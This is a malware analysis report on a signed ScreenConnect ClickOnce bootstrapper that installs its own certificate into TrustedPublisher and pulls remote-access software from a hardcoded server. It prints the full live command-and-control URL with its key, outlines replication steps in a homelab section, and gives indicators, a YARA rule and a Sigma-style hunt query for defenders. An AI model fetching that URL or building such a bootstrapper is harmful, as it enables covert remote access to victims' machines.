typeanalysisfamilyconnectwiseconfidencehighcreated2026-08-03updated2026-08-03pecompilersigningc2mitre-attckdefense-evasionlegitimate-remote-access-tool-abuse
SHA-256: 050e582512aac223eecc32d19baf386c61353c826404dc4234dfeacd24c0ff12

connectwise: 050e5825 — ClickOnce bootstrapper, May 2025 build with 84.54.33.84 C2

Executive Summary

A 305 KB MSVC-compiled PE32 ClickOnce bootstrapper signed by ConnectWise, LLC (DigiCert). Eighth confirmed sibling in the ScreenConnect abuse cluster. New compile timestamp (May 20 2025), same PDB and import surface as Apr 2025 twins (81adbf9a/604e1cc7). C2 IP 84.54.33.84:8041 reuses the same infrastructure seen in Nov 2022 MSI-bundle sibling 73a8126b. Delegates all payload delivery to dfshim!ShOpenVerbApplicationW after installing its own publisher certificate into TrustedPublisher. Static-only; CAPE skipped.

What It Is

  • Format: PE32 executable (GUI), Intel 80386, 5 sections ^[file.txt]
  • Size: 312,528 bytes
  • Compile time: Tue May 20 19:01:23 2025 UTC ^[pefile.txt:34]
  • Linker: MSVC 14.40 (Visual Studio 2022) ^[exiftool.json:18]
  • PDB path: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb ^[strings.txt:308] ^[rabin2-info.txt:13]
  • Language: C/C++ (CRT strings, no .NET metadata) ^[rabin2-info.txt:19]
  • Signed: Valid Authenticode by ConnectWise, LLC (Tampa, Florida), issued by DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 ^[strings.txt:700] ^[binwalk.txt:7]
  • Certificate signing time: 2025-05-20 19:14:19Z ^[strings.txt:713]
  • Guard flags: CastGuard only (0x100); no CFG, no SafeSEH ^[pefile.txt:415]
  • Imports: KERNEL32.dll (CRT + loader) and CRYPT32.dll (certificate store operations) ^[pefile.txt:239-344]
  • No exports, no packer, no anti-debug, no VM checks.

This sample is a cluster sibling of the ConnectWise ClickOnce bootstrapper family. Shared build fingerprint, entry-point logic, and certificate-trust bootstrap are documented at connectwise; this report covers per-sample deltas only.

How It Works

See connectwise entity page and sibling report 81adbf9a for the full certificate-trust bootstrap → ClickOnce deployment chain. ^[/intel/analyses/81adbf9af2875a3f442a6453a2e4cc637ea8642a7ddedf07134a853620daa7e6.html]

This sample executes the identical two-stage flow:

  1. Extracts its own Authenticode signer certificates via CryptQueryObject + CryptMsgGetParam.
  2. Installs them into the TrustedPublisher store with CertAddCertificateContextToStore.
  3. Loads dfshim.dll → resolves ShOpenVerbApplicationW → launches remote .application manifest.
  4. On any Crypt32 failure, sleeps 40 s (0x9c40 ms) and retries. ^[r2:main]

Per-sample delta — C2 infrastructure and timeline:

Field This sample (050e5825) Sibling 81adbf9a Sibling 73a8126b (MSI era)
Variant ClickOnce bootstrapper (Variant B) ClickOnce bootstrapper (Variant B) MSI bundle (Variant A)
Compile time May 20 2025 19:01:23 UTC Apr 8 2025 18:34:09 UTC Nov 2022
C2 IP 84.54.33.84 134.122.4.2 84.54.33.84
Protocol https:// http:// http:// (MSI direct)
Port 8041 8041 8041
URL path /Bin/ScreenConnect.Client.application /Bin/ScreenConnect.Client.application (embedded MSI tables)

The C2 IP 84.54.33.84 first appeared in the Nov 2022 MSI-bundle sibling 73a8126b. Its reappearance here, ~2.5 years later in a completely different deployment morph, further confirms the attacker maintains a stable IP pool across variant generations. ^[entities/connectwise.md]

C2 URL

https://84.54.33.84/Bin/ScreenConnect.Client.application?h=84.54.33.84&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQCdLjAD8yszihPgOEc2eP4iyP%2f7mfVDiz7Z%2fkjBjBEEhJhrg2GrG1Ns7mZe1LsyQGju4XhsfbfjSu2p2a3pkzdO76r69wzEAMS2zz8HSAYH2OAd8pGPIOqhrkBR8ZHgiOx%2fRIxrjfCVGGodbBe6pD%2fp8nZrIRMaN%2ba9YN8%2bK2MN305MUjoKryIvKPVwSmnFavzQ1qGnE3RBVw5Kc8J3blUJn612ObUvDQh1bbqX0TGXgEMC5cqzVX3GHK0HTcqTYB%2fAhi%2fWi9hJ4gLMsMZKftSVrtcMGEDOTGCbAUn621vyUCJWVSa1XGFC6zJZCt9TGYdz6UHfwEFh3jEXONvhlPvc
``` ^[strings.txt] (wide-char strings)

- `h=84.54.33.84` — relay host (same as C2 IP)
- `p=8041` — listener port (consistent across all siblings)
- `k=` — base64-wrapped RSA key (ScreenConnect session/installation key)

## Decompiled Behavior

**Entry point (`entry0` @ 0x401532)** is standard MSVC CRT startup: initializes security cookie (`GuardCFCheckFunctionPointer` @ 0x43f18c), runs dynamic initializers (`fcn.0040dff9` iterating function-pointer table), then dispatches to `main(argc, argv, envp)`. ^[r2:entry0]

**Certificate-trust bootstrap (`fcn.0040e114` chain):**
- Calls `fcn.0041034b` which loads `dfshim.dll` and resolves `ShOpenVerbApplicationW` via `GetProcAddress`.
- Uses `CryptQueryObject` to inspect its own file signature.
- Enumerates signer certificates and installs them into `TrustedPublisher` via `CertAddCertificateContextToStore`.
- On failure, sleeps 40 seconds (`Sleep(0x9c40)`) and retries.

**Notable import:** `CertDeleteCertificateFromStore` is imported (same as sibling `604e1cc7`), suggesting touch-and-go certificate cleanup after the ClickOnce launch — a post-deployment hygiene step not seen in the earliest variants. ^[pefile.txt:336]

## C2 Infrastructure

| Indicator | Value |
|---|---|
| C2 IP | `84.54.33.84` |
| Port | `8041` |
| Protocol | HTTPS |
| URL | `https://84.54.33.84/Bin/ScreenConnect.Client.application?h=84.54.33.84&p=8041&k=<key>` |
| Application name | `ScreenConnect.Client.application` |
| Product | ConnectWise ScreenConnect (abused) |

## Interesting Tidbits

- **Compile timestamp to the second precision** across Apr 2025 twins (`81adbf9a`/`604e1cc7`) and this May 2025 build suggests a CI/CD pipeline with per-build parameterization for C2 endpoints, not manual rebuilds. The PDB path references `C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb` — a build-agent path, not a developer workstation. ^[strings.txt:308]
- **Certificate signing time (19:14:19Z)** is ~13 minutes after compile time (19:01:23Z), indicating automated signing in the same pipeline. ^[strings.txt:713]
- **HTTPS upgrade:** The Apr 2025 twin `604e1cc7` was the first observed sibling with `https://`; this May 2025 build also uses `https://`, suggesting the attacker has standardized on encrypted transport for ClickOnce manifests.
- **No network imports in IAT:** All HTTP is delegated to `dfshim.dll` → `dfsvc.exe` → `dfsvc.exe`. The binary itself never opens a socket. This is a deliberate opsec choice: the bootstrapper's network footprint is indistinguishable from legitimate ClickOnce application installs. ^[pefile.txt:239-344]
- **Certificate chain still validates:** The DigiCert Trusted G4 root is present and unexpired; the ConnectWise LLC leaf certificate has not been revoked as of analysis date. ^[binwalk.txt:7-13]

## How To Mess With It (Homelab Replication)

This is a **legitimate tool abuse** pattern, not a custom malware build. Replication requires:

1. A valid code-signing certificate (self-signed for lab; stolen/compromised for real threat actors).
2. A ClickOnce `.application` manifest pointing to a remote `.deploy` package.
3. A native bootstrapper that:
   - Calls `CryptQueryObject` on its own file.
   - Extracts signer certs with `CryptMsgGetParam`.
   - Adds them to `TrustedPublisher` with `CertAddCertificateContextToStore`.
   - Loads `dfshim.dll` and calls `ShOpenVerbApplicationW("https://host/app.application")`.

For a buildable skeleton, see the "How To Mess With It" section in `81adbf9a` report. ^[/intel/analyses/81adbf9af2875a3f442a6453a2e4cc637ea8642a7ddedf07134a853620daa7e6.html]

## Deployable Signatures

### YARA rule

```yara
rule ConnectWise_ClickOnce_Bootstrapper {
    meta:
        description = "ConnectWise ScreenConnect ClickOnce bootstrapper abuse"
        author = "PacketPursuit"
        date = "2026-08-03"
        family = "connectwise"
        confidence = "high"
    strings:
        $pdb = "ClickOnceRunner.pdb" ascii wide
        $dfshim = "dfshim.dll" ascii wide
        $shopen = "ShOpenVerbApplicationW" ascii wide
        $trusted = "TrustedPublisher" ascii wide
        $opus = "1.3.6.1.4.1.311.4.1.1" ascii wide
        $screen = "ScreenConnect.Client.application" ascii wide
        $url_pattern = /https?:\/\/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\/Bin\/ScreenConnect\.Client\.application\?h=/ wide
        $cert_create = "CertCreateCertificateContext" ascii
        $cert_add = "CertAddCertificateContextToStore" ascii
        $cert_open = "CertOpenSystemStoreA" ascii
        $sleep_40 = { 68 40 9C 00 00 }  // push 0x9c40 ; Sleep
    condition:
        uint16(0) == 0x5A4D and
        filesize < 500KB and
        $pdb and
        $dfshim and
        $shopen and
        $trusted and
        $opus and
        any of ($cert_*)
}

Behavioral hunt query (Sigma-like)

title: ConnectWise ClickOnce Bootstrapper Execution
detection:
  selection_process:
    - Image|endswith: '\ClickOnceRunner.exe'
    - CommandLine|contains: 'ScreenConnect.Client.application'
  selection_cert:
    - Image|endswith: '\ClickOnceRunner.exe'
    - TargetObject|contains: 'TrustedPublisher'
  selection_dfshim:
    - ImageLoaded|endswith: '\dfshim.dll'
    - ParentImage|endswith: '\ClickOnceRunner.exe'
  condition: 1 of selection_*

IOC list

Indicator Type Notes
050e582512aac223eecc32d19baf386c61353c826404dc4234dfeacd24c0ff12 SHA-256 This sample
84.54.33.84 IPv4 C2 relay / ScreenConnect listener
84.54.33.84:8041 IP:Port Listener port (consistent across all siblings)
https://84.54.33.84/Bin/ScreenConnect.Client.application URL ClickOnce manifest URL
C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb PDB Build pipeline leak
TrustedPublisher Registry Certificate store target
1.3.6.1.4.1.311.4.1.1 OID SPC_SP_OPUS_INFO_OBJID (ClickOnce publisher info)
ConnectWise, LLC Authenticode Subject Tampa, Florida
DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 Issuer Intermediate CA

Behavioral fingerprint

This binary extracts its own Authenticode signature, installs the publisher certificate into the Windows TrustedPublisher store, then loads dfshim.dll and calls ShOpenVerbApplicationW to silently install a remote ClickOnce .application manifest from a hardcoded HTTPS URL (https://<IP>:8041/Bin/ScreenConnect.Client.application). It contains no direct network APIs, no packer, no anti-debug, and no VM detection. All evasion is in the valid signature and the legitimate ClickOnce trust chain. The binary retries on failure with a 40-second sleep.

Detection Signatures

Technique MITRE ID Evidence
Install root / publisher certificate T1553.004 CertOpenSystemStoreA("TrustedPublisher"), CertAddCertificateContextToStore ^[pefile.txt:239-344]
Remote access software abuse T1219 Hard-coded ScreenConnect C2 endpoint, dfshim!ShOpenVerbApplicationW ^[strings.txt]
Ingress tool transfer T1105 ClickOnce manifest download via delegated HTTP/S ^[strings.txt]
Valid Accounts (code-signing abuse) T1078 Authenticode by ConnectWise, LLC ^[strings.txt:700]
Application-layer C2 T1071.001 HTTP/S delegated to ClickOnce runtime ^[strings.txt]
User execution T1204.002 Malicious .application execution flow ^[strings.txt]

References

  • /intel/analyses/81adbf9af2875a3f442a6453a2e4cc637ea8642a7ddedf07134a853620daa7e6.html — Canonical deep-dive: first observed ClickOnce bootstrapper (Apr 2025)
  • /intel/analyses/604e1cc7d2a390a2d211239f4335cb0c0d80d8b9ee48c35f823a78d60e861886.html — Seventh sibling: cross-variant IP reuse (Apr 2025)
  • /intel/analyses/9477ccddefa6fd57cb2ab68a6cd77229dd2e2bf87f573e2b80eb60555d94e530.html — Fourth sibling (Apr 2025)
  • /intel/analyses/73a8126b8d5443295250815df160f550effeedf1f8adfd0ac2d5160824ca8f37.html — Sixth sibling: MSI bundle with same C2 IP (Nov 2022)
  • entities/connectwise.md — Family entity page
  • techniques/clickonce-certificate-trust-bootstrap.md — Technique deep-dive

Provenance

  • File-type: file v5.44 ^[file.txt]
  • ExifTool: v12.76 ^[exiftool.json]
  • pefile: Python pefile library ^[pefile.txt]
  • radare2: rabin2 -I + r2 -A ^[rabin2-info.txt]
  • strings: strings -a / strings -el ^[strings.txt]
  • binwalk: v2.3.4 ^[binwalk.txt]
  • FLOSS: flare-floss v3.1.1 — failed (CLI argument error) ^[floss.txt]
  • capa: v8.0.1 — failed (missing signatures) ^[capa.txt]
  • CAPE: skipped — no Windows guest available ^[dynamic-analysis.md]